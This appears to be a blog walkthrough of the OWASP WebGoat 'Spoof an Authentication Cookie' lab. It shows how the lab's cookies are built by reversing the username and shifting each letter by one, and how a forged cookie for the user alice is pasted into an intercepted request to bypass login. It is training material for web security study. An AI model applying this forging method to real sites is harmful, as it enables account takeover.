SPOOFING AN AUTHENTICATION COOKIE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFia2APtyliAc5htBkpR_zVv-W_1wwCZDE_kTRcBbU5DWkLkWEdVJIYIiSRBSc3EB3luuwBsGceU92znlR-Uji3Ky95rOyizPrn0nl-MihHmxSYXFHOhPkP2ny2PGoS5OsROWym2fU9tE/s400/screenshot.2.jpg)
1 - Authentication cookies
- Authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with.
https://en.wikipedia.org/wiki/HTTP_cookie
- Without such a mechanism, the site would not know whether to send a page containing sensitive information, or require the user to authenticate themselves by logging in.
- The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted.
- Security vulnerabilities may allow a cookie's data to be read by a hacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs.
- In this exercise the OWASP WebGoat v5.4 will be used for the purpose of exemplifying the spoofing of an authentication cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9tSEx9y4NY_IwfRqLfhi5m7QZxoF-v6NwVwIPoMPJjEvYOOYetv_rpzH-hvK8wNUdYQXDM1MXBNsyexxnQ7wXIOENszlkIxbWnwHIw6r0kZChNPMMBitd9r_DUFUg9K1pV7lQIOOWyqNu/s1600/screenshot.1.jpg)
2 - Session Management Flaws
- Going to Session Management Flaws -> Spoof an Authentication Cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNv046KnZJ6OTc7ZfP2kEOJXfxH_aHfzzEGCjjH3ZANNTyLyXs7pD8NsDaDwWHfpZMdLP__Af0zevjD8Zzqd6tQyItwZ4ovyze2XwWT3TVGXvpIWeogN4rxyf2pzxhthYipP54bVa9Td7Z/s1600/screenshot.3.jpg)
- The scenario consists of a login web form that works correctly for two different username/password cases, for instance signing in with webgoat/webgoat and aspect/aspect the authentication is ok:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwFQzaB8BNaNvC8yMmticv78VW-WfRqBxL2m15BrDT6z9Qt8kOmWTDwqgg_eyU-44EE6hl6_qqWmRvBZ1N49CUmLSw5r7DSFm5NYwvrQBFCQRw6fMTi3lG5arnoFUmZU5ZYx_ZjU5E-L7/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6tDqs47vgT1n7CHvgDTN8iHSfdeglJPq2ptfdB_38MhdbRiHAW2z_6j7-VHlXmV8f1B0Nem3oOlIG86Yx86YsiDWvGG4zECaYMFxl91oc2L2FavcpX_fQGU_uMzh-_TnhKgDJ8PZcNVJ/s400/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1YpGiCodQtGc-GI_3ecu9ahtg_0UU7Lxym0T8WTAtCOUay2XULyIMz9rlmSygZfdjz1wVr6d2zS-q-EwcP7XQuNMGT26Pyj_3nxsSJ2us7zab7czb1BukMwIlM7SkpXsXJ5BcUb3di9c/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8d0FW8JAbBlVgSmw_83VJjwqK_Dq_R0XcLvrRqAXmrGd8gn6HaYTAJIlvLoJbWkuc1vm7069Uxfvd3pAU4rQ_4Y1je7zCgoQs_IdnpElwgTLHWTVH5nIli_urN1IYfddQoV2goBnb2RJ-/s400/screenshot.6.jpg)
- However, the challenge is to achieve a successful authentication bypass for the user alice, what at first is rejected by the login process:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtVgoKHfKKQr8mWE4lNXdi7clQVw7h_R-TZBFE4FM9awwJRZzR8UvOzFOMjC5ogj_d2VKc74-EkBR3sJbVQf3kUXNV5Wyl6NBRmO1opHvkZuxpXCwFUz9vKdatRjavyWe9ydD0ryuA3vuc/s1600/screenshot.7.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlrvP39wCaMKvvvXGuCECtwZ8zWebLuKVHI8HUXYwhXsI9rO5K4Nxpc43P6dmLLdK9vaPvxIdyz-RIOT906rKrMFPPtmkSCYEVQ3QVtg_JGAhAI2-Pw0MYMstr12zP9otPWyfPlqC1xrY/s400/screenshot.8.jpg)
3 - Tampering the authentication process
- With the purpose of retrieving authentication cookies for webgoat/webgoat and aspect/aspect let's use the Tamper Data add-on of the browser Firefox:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia0fmIwm2NHEZ49chHZx9JASscOfUZKJmqrULT9ZZ-MQp3YmJ6f4ZQoS852e8LcGRCn3vMmqC8odfRLa78tRmz0e9q-al3fUaMkuxaDmz6RoJwjWW2oYIe1YrZjSPtuuU_xyou6k6MFEjQ/s400/screenshot.9.jpg)
- Starting the tamper:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDxG9lMBnQHAvTWz1EaqD07fsYOY45NN4uKrkiBroCQy_VMLBL1NPNGL3MSsBPNB9_36xjPWKf1yGIipwAsA6K6q8Ap4-rR0CFS9CpRA1JzI0ZmuEjtga44HguAlD0WPwdjdAQdl6L36Zz/s400/screenshot.15.jpg)
- Now, let's sign in with webgoat/webgoat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaL1oApnvCrE4LhbFCc5rOFzHm7hChrQux71oi_JYvMJwjx4J6RVuJkc48eBCmqR9lMSwwmVabAWaDh2nKRHztN9Pu8sTA9gIqQKrulzUvflKh1qoR2mkUxY4_pWr_TcRWigU-kbgs7hhN/s1600/screenshot.11.jpg)
- Tampering:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikL1ihCl4YGzM2arZRBPSJ0o4Tq4i0XkZQW4oNj1sCDDdQO0YpTyzZMIUo0g2XePO943doe79d0X3Bi3tdLva2zLG50299k67TUr_AXSzqmURWLn6q4bZVhIuVmLBbzdZJjeDcZYXQId-3/s1600/screenshot.50.jpg)
- Copying the cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaCUdpJoUbuxPhSdV1dzpjnR9DDrntvEkP4cbGwbWFR5FL-ECTtmDknm3NFX9Oe5xot7GwI66Cpgyiu0Gk_ogOlM1BQNzAxGeZ0HRkt7oz90fA_olg9Znc22qAapV4DqMWdOgMT2QC2VeK/s1600/screenshot.51.jpg)
- Storing the authentication cookie for further study:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPQdOtcyrm1SBnlBCTuPrYawi3ogAN-aUjKf6JaFE4FdG7vqmFcrfeOteCnR7-HxJMySgirIPLkOH8FI0Bc9bQ0oOdL3EVWOSEmPzNC97orfg5ov0tJDqB6Eo5ZvD5Y3moYHGZBMqq29J/s1600/screenshot.52.jpg)
- Same thing for aspect/aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_7jIHnfQ9wIOqmVPUmf5NewtxVUHttvYKUuvIk-AC8s2AxNC2aX-j_-Gla2AByx4TnPxn_gYaxvSqzaQsCwVJ3sat3S0eY2sXCm3KvBGv3ONKs1RGlf3YZ1UEisafu54CXzJnQbYGQSE/s400/screenshot.54.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXF0dCYRROrwNCM96Ea8a_FhQMSwXeMiJeE-yGkVQWw7PH1ZdQNs4ylJxE1_q0TVtgmVdJTQn0Q1g_TXHlk5MDPcskxl9uaXyE_hBX4rdz34ByR1ud9LLnt8TSH-cZ-zK1FjirsVptWmFR/s1600/screenshot.53.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLrPUb_BjqYIi5tQyfRhNqR8WzDdK3m6hrMBTMlo-HtBpF-WOwcLyOOw7sIuCC95XN1LRneMKGyxBrtNNgqVFI7mhWXgEjRqT7zyuaarRwZJ0gW3YC1hlcy6Ifeiws5wkWqEDPUxwQFYN/s1600/screenshot.56.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6o0Wg50-mcF-DAxYnb7CmIblj9i_ZuxFXboBXAvRHsoO4cYrvvt6_f9sdct8G9241WoViUsVDypI2V6fC-7UTdwC1d3VDKYvpKRrn00zyj-01w7RyfHhTmpFq8c7ozmvYDOdjx7FM3qPX/s1600/screenshot.57.jpg)
- As a result of the tampering, now we have two authentication cookies, one for webgoat/webgoat and the other one for aspect/aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidXBBM1jrPjJ23nfqmIsRl4u1nbXeZsksbjkWuBkqlgKlIFBtlwN7XNapCSADaqtXNzOH9IHFQPXyec1kDGC87cNJPEipCXEnGqZBSOpQQbRqRBdqv0xXhAU5r_Z70nZ8pgm5wvCxR3q_b/s1600/screenshot.58.jpg)
- Comparing the two cookies it is clear that both start by 65432 and end up with two different strings: ubphcfx and udfqtb
4 - Decoding/encoding the cookies
- Going to:
yehg.net/encoding
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5PNLPI_1aXUX0PpfWGhIuorPOjHkYeaSKJMP1msNT8oXdt_l4iVc-MX6XFeLB7dedJMRd_0wc6pQVhT9aviEobtwBi6UIeNFZIFPi2zSDjOQsU9ByOXnEyAua1ORFSrlY5ZtB-8UXZqf/s320/screenshot.72.jpg)
- Entering the string ubphcfx and reversing:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1oBk6jkRvxInkoQHGD5hK7C4-IAXW0XsehOgePceRJGtig19YzdpobuufLs88C_e-7apEF-yHiSS1kQMlzxK7wpMl38JAQnDPl7B4UUEw506Ut9jIgaV63bHw-7kMYoclZ6gpdaaFoKuG/s1600/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrzlbKAuio_146shxJru5hqz2ZkvCuhdxAQ-Ut7UOZZeWM1R7ertalZ0AQcriJNAU5I8ld21Xk8QHZfH-Wzz6v7wLq9Su4aaguNjLnQMOUSNrM_WSIbtI4MKT0qCZCBIRP-wjABxtnrp_-/s400/screenshot.74.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYekMoSARXuIQKVaDOG0uQcEBHJFHnfie1us79x8SS-YTAMtNnnMrS4IcwYukkLyrB0sLt1NxTAguy9Cw101Itl3vhNYJrH-FZDzAhwo2KMEJWJWX8dfYax93iTaM_risbhvfn_gdFV1ee/s400/screenshot.75.jpg)
- Decoding with Char-- (shifting down one character):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTN068b37vW8PTQvnZzWrapmEn2WFA6qUJjRA5Rx-PG6DZnAhg7d8GVifyZFBnbX3DXb9Q-fSa-desIn3Z06uKmij3joIp78dwa1bkPbxWfRA8H2i4hkWuIjzbe6wrzyGiKVD4pAuLMKhP/s400/screenshot.76.jpg)
- The result is the expected webgoat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNs7Qo77jgaENlLkSal0KOuwE9B4rQQ9Q-ZGvJcD1WeYy1JlJIoqwDHpaLv3gAHSCk39mZ6_P8oN4Dd-tUon-6N_t7rwKWDI4rVg85mkYUEOuLzi_Pl5s_Xp2ir14dUThgSq3EOT7iuisO/s1600/screenshot.77.jpg)
- Same process with the authentication cookie udfqtb obtained for aspect/aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3F5uO-1JVirToK6UZrWZCP92AYdlr3O7kDeY9xBiuM3lf-jJkwHTR0dnhq29t7baG7aJIioj7Z0uJ24jaapDuTQkUEmZHB1cn_2jbU90tniPnnbQDJ8KNsP8DCNTJ21v8cqki6JJxXA7T/s1600/screenshot.79.jpg)
- So now what we can do is to follow the reverse method with alice in order to achieve a similar string to build a new authentication cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xfi5joLehmLE6A2ARL6nP70E4PwiokwGBjKX4FsxDKB6TzCGC0lg5wiSPZPzom7WmtLui2-CH8_4A8UNpMI0ko60WagRn8SYberle23e7PhroTUoeOVII5PvjcV59U6LN50uJAiTQLhD/s400/screenshot.80.jpg)
- Reversing and encoding with Char++ (shifting up one character):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMHlb7EUTOht8w-gWxy-_DkAE9ckJGiqarFDxRhy4gqudHyzvtGhhHWSDs6G0R8cH28URACP84r9hOHRQpj90pewB6v9cZGLUCFCzA33DWZsYVw86PC6yMFz4531_u40Niga3OnqWkMhPu/s400/screenshot.81.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI8uaERo6I8pFXNHNQ69M-_WxFqm4NmKiEDfXZQOb_0cCsTcJXMmyjgeKzkZE0FFshXv90HeNXlSBFx0KnknGAe4VA2Xn4HFCDsMTxDNR9Oj3pJILh_g-Sv50U-Ip5-3ztJbWODnxyv-t_/s400/screenshot.33.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4LurbJ7HiwfEwLobbw7nnWcfnNpxGWmmMOGAIJ2zxBzPx-w_d8aciu4M9p6Df99o4QOJMAxBHKtRa4pGhsX2W50NHHAVOw1PlgoIjo6Jf9UCXxEHUL-7H_yI4Oc5iBvmkr3rFR4LqwXq/s1600/screenshot.34.jpg)
- The result is:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XK6ZQqbub3xoRpwZIg7UQaash5-QPGME5wcvfj6zOh4MtatXWJpyJdkcl0gg1wmx-pOTrHl6IN75s8_chx2rctC1u8mrxhaMN0Yp18Z2CPnuOTjwRUZvwK_JxxcNNWye7siBKb_wJIiS/s400/screenshot.35.jpg)
- Actually the encoding process is very simple, consisting of just reversing plus shifting one character:
wegboat -> taogbew -> ubphcfx
aspect -> tcepsa -> udfqtb
alice -> ecila -> fdjmb
- To build alice's cookie the string fdjmb is prepended to 65432 in this way:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOXbvvtLTQv3tTap58cxUHxm-HQxju0QxGdZSVDxz3wfxrqVTqyYG9z1LaGPJ255-AK0J_rSVkFRxGSonWf9RgGIO4LgqLCkSDAdJkzPw3NMhDP5RQxHTmQbVSR48sSudigBhSkln0gAo/s1600/screenshot.70.jpg)
5 - Launching the cookie spoofing attack
- Now, let's tamper again an authentication session for webgoat/webgoat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY3EZ3Y_ozv7nWFuQ8otA7EjzoxVZ5kLXpByazTtxNfukPJHEfB9rzlkEVeUGE254k4p-DwsBLy-1yBujEQYqaa6hTjjpo0Bf4TYWA1cG__U3utwClDuMV7AmOA1eLLq1rpyYUGnXxNNY/s400/screenshot.62.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2eKPs-XISWkn41z4GWrNnz-yLHxiyM0kj6x865rAix-4P6G6WeUxPpLQfGlMn7whqoAkwss0fRmdqaAi1JhjC1mECQ2-jZyrzRKuGPDZ4RO561tKRAcdteO020OG3E59OF5vVfGq47jgb/s1600/screenshot.63.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_lt9Zdex1FZmp-c_LAx1Odn1tJ01IAkx9tt5cXCUd1B_OZS1mygPOeyARX76ZGDRNm92BwJ3gfof78aHtid1ZVvw-3o6h9fOzfQ4fYhBy9nwSluWgCg6MOIs5oEfnZke2ii-uXevYMZZr/s1600/screenshot.64.jpg)
- At this moment, let's copy alice's crafted cookie and paste it into the cookie field:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjUrxg3lgX6xcPqgAg8I96JlRa0izaejRmg0yo86md3Xq90vAVnEwoYr-4-L-v5McaRO4nN68DoWMG_WLJaVP6fzFErnzyEou1CoEJThlDw26aoBpuGPBVFwqsaxfYmZqUT40z4E50PyJ/s1600/screenshot.60.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA3WqYbazHKicCmYEntOKEqkvD_yDPDEtuq7IFh2VYpLhUJYIESxA_ggfwBJliXmu0oz1bn5d91vBkzgRPXW1Pgg-Px5oC1-rIIhrXErSwgm05haIZYfcs1xd6ixoqbx0tNXFXRvrDRB6E/s1600/screenshot.67.jpg)
- Clicking OK:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixL42IXlIivxYTVgTLDqvmiYbFarmNRP03Crp7_KzLqqetXzdQNBUgIWjCd8wIxKIDXputHT3HQXCHx8hNPx_WiheSYwAvJYirJ-JQlEie2qce8nCv0wrNdDhlNRMB0NFTck3kaBoICzB1/s400/screenshot.68.jpg)
- Finally the attack is successful and the spoofed user alice becomes authenticated:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP9NOu8JvkQYevmI1JnqIon65Y0w-49R9hKw4w9Qjze5TZNcoGyGi1yz5O-LD50SYGWbtWQnpnwCPF6N800lwhO04MX8FrlxVkFDLNbEmZfbBGFeyYhC9Pz_f73qt48QY8R82koRnsqTYm/s1600/screenshot.71.jpg)